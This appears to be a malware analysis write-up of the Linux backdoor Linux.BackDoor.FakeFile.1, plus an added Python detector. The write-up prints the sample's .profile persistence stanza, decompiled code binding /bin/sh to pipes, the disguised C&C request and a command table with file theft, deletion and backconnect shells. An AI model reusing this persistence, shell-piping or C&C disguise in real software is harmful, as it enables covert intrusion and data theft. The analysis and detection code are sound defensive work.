SHA1:
- 0138fc4d50c734e288388f7c8cbbea5e2ad08a8b
A backdoor for Linux. Upon launch, it copies itself to the file
<HOME>/.gconf/apps/gnome-common/gnome-common
It then searches for a hidden file whose name matches the Trojan's own file name and replaces the executable with it. For instance, if the ELF file of Linux.BackDoor.FakeFile.1 is named AnyName.pdf, the Trojan searches for a hidden file named .AnyName.pdf and replaces the original file with it using the command mv.
If the file is found, the Trojan opens it in the application matching its extension:
| Extension | Application |
|---|---|
| .doc .DOC .xls .XLS .ppt .PPT .docx .DOCX .xlsx .XLSX .pptx .PPTX .odt .ODT .ods .ODS .odp .ODP | soffice |
| .pdf .PDF | evince |
| all other extensions | gedit |
If no such hidden file exists, the Trojan creates it and opens it in gedit. The Trojan then checks the name of the Linux distribution installed on the device: if the name is anything other than openSUSE, Linux.BackDoor.FakeFile.1 writes the following lines to the file <HOME>/.profile or the file <HOME>/.bash_profile:
# if execute the gnome-common
if [ -d "$HOME/.gconf/apps/gnome-common/" ] ; then
"$HOME/.gconf/apps/gnome-common/gnome-common"
fi
The viewer application and the Trojan's own copy are both started through a shell whose standard streams are tied to two pipes (decompiled code; declarations and comments added for readability):
int v31[2], v32[2];   /* v31: parent -> shell stdin, v32: shell stdout/stderr -> parent */
int v50, v51, v52;
pid_t status;

pipe(v32);
pipe(v31);
status = fork();
if ( !status )
{
  /* child: stdin from v31, stdout and stderr into v32, then replace itself with /bin/sh */
  close(0);
  dup(v31[0]);
  close(1);
  dup(v32[1]);
  close(2);
  dup(v32[1]);
  close(v32[1]);
  close(v31[0]);
  close(v32[0]);
  close(v31[1]);
  sleep(1);
  while ( execl("/bin/sh", "/bin/sh", (char *)0) < 0 )
    sleep(1);
  exit(status);
}
/* parent: keep copies of its own streams, then read from the shell via v32 and write to it via v31 */
v50 = dup(0);
v51 = dup(1);
v52 = dup(2);
close(0);
dup(v32[0]);
close(1);
dup(v31[1]);
close(v31[1]);
close(v32[0]);
close(v31[0]);
close(v32[1]);
/* hand the shell the command line s1 followed by one byte from the data section (unk_8053D40) */
write(1, s1, strlen(s1));
write(1, &unk_8053D40, 1);
If the Trojan is launched from <HOME>/.gconf/apps/gnome-common/gnome-common, it reads the configuration data from its own file and decrypts it. The malware then starts two threads: the first exchanges data with the command and control (C&C) server, and the second monitors the duration of the connection; if the Trojan goes more than 30 minutes without receiving a command, the connection is closed. During the exchange with the C&C server, the server's replies are disguised as HTTP requests that look as follows:
GET /index.asp?title=Welcome&picture=welcome.gif<encrypted string> HTTP/1.0
Host: <IP address of a victim>
User-Agent: Mozilla/4.0
Connection: Keep-Alive
Accept: */*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
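As an added example (not from this write-up or from the sample itself), the following Python checks for the host and network indicators described above: the launcher lines written to ~/.profile or ~/.bash_profile, the self-copy under .gconf, and the disguised C&C request line with its duplicated User-Agent header. The sample request in the main block is constructed, and the `exists` parameter is an assumption added so the file check can be exercised without touching disk.

```python
import os
import re

# Indicators taken from the write-up: the self-copy path and the launcher stanza
# appended to ~/.profile or ~/.bash_profile (regex tolerates any whitespace/newlines).
DROP_PATH = ".gconf/apps/gnome-common/gnome-common"
PROFILE_STANZA = re.compile(
    r'if \[ -d "\$HOME/\.gconf/apps/gnome-common/" \] ; then\s+'
    r'"\$HOME/\.gconf/apps/gnome-common/gnome-common"\s+fi'
)
# The C&C exchange is hidden in a GET for index.asp with fixed parameters,
# an appended encrypted string, and an HTTP/1.0 version tag.
BEACON_LINE = re.compile(
    r"^GET /index\.asp\?title=Welcome&picture=welcome\.gif\S+ HTTP/1\.0\s*$"
)

def profile_is_infected(text: str) -> bool:
    """True if a shell profile carries the gnome-common launcher stanza."""
    return PROFILE_STANZA.search(text) is not None

def find_dropped_copies(home_dirs, exists=os.path.isfile) -> list:
    """Return existing self-copy paths; `exists` is injectable for offline checks (assumed helper)."""
    candidates = (os.path.join(home, DROP_PATH) for home in home_dirs)
    return [path for path in candidates if exists(path)]

def request_is_beacon(raw_request: str) -> bool:
    """True if the request line of a raw HTTP request matches the disguise."""
    lines = raw_request.splitlines()
    return bool(lines) and BEACON_LINE.match(lines[0]) is not None

def duplicate_user_agent(raw_request: str) -> bool:
    """Corroborating signal: the sample emits the User-Agent header twice."""
    headers = raw_request.splitlines()[1:]
    return sum(h.lower().startswith("user-agent:") for h in headers) >= 2

if __name__ == "__main__":
    # Constructed request in the shape shown above (not captured traffic).
    sample = ("GET /index.asp?title=Welcome&picture=welcome.gifQWxhZGRpbg HTTP/1.0\r\n"
              "Host: 192.0.2.10\r\nUser-Agent: Mozilla/4.0\r\nConnection: Keep-Alive\r\n"
              "Accept: */*\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)\r\n"
              "Pragma: no-cache\r\n")
    print("beacon:", request_is_beacon(sample), "dup UA:", duplicate_user_agent(sample))
    homes = [os.path.expanduser("~")]
    print("self-copy found:", find_dropped_copies(homes))
```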
Linux.BackDoor.FakeFile.1 can execute the following commands:
| Name | Function |
|---|---|
| RR | Send the C&C server the number of messages transferred during the session |
| DR | Send a listing of the specified folder's contents |
| DF | Send the C&C server the specified file, or a folder with all its contents |
| D1 | Delete a file using the command rm -r |
| D0 | Delete a file using the command unlink |
| RF | Rename a folder |
| US | Remove itself |
| RP | Launch a new copy of the process |
| | Close the current session |
| RT | Establish a backconnect and run sh |
| CP | Terminate the backdoor's operation |
| FF | Open the process's executable file for writing |
| CO | Close the process file |
| BF | Create a file or folder |
| FD | Write the transmitted values to a file |
| EF | Obtain a directory listing using the command ls |
| CX | Set permissions 777 on the specified file |
| CR | Terminate the backconnect |